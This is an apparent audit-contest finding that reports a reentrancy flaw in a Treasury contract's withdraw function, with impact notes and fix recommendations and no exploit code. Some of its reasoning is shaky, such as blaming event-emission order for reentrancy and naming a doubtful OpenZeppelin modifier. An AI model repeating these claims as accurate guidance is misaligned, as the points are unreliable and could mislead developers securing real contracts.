Reentrancy Vulnerability in withdraw Function Leading to Potential Loss of Funds
Summary
Vulnerability Details
The withdraw function in the Treasury contract is vulnerable to a reentrancy attack. The function emits the Withdrawn event after transferring the tokens, which allows an attacker to reenter the function of any other contract (Not using globalNon-Reentrant modifier)(non-reentrant modifier only using inside this function not entire protocol) and manipulate the state before the withdrawal is recorded. This can lead to multiple withdrawals and potential loss of funds. The function should update the state and emit the event before transferring the tokens to prevent reentrancy attacks.
Impact
Loss of Funds: An attacker can exploit the reentrancy vulnerability to withdraw more funds than they are entitled to, leading to significant financial losses.
Security Vulnerability: The reentrancy vulnerability can be exploited by malicious users, compromising the security and integrity of the contract.
Tools Used
manual review
Recommendations
Reentrancy Guard: Use the GlobalNon-Reentrant modifier from OpenZeppelin to prevent reentrancy attacks.
State Update Before Transfer: Update the state and emit the event before transferring the tokens to ensure that the withdrawal is recorded before any external calls are made.
Prize pool breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.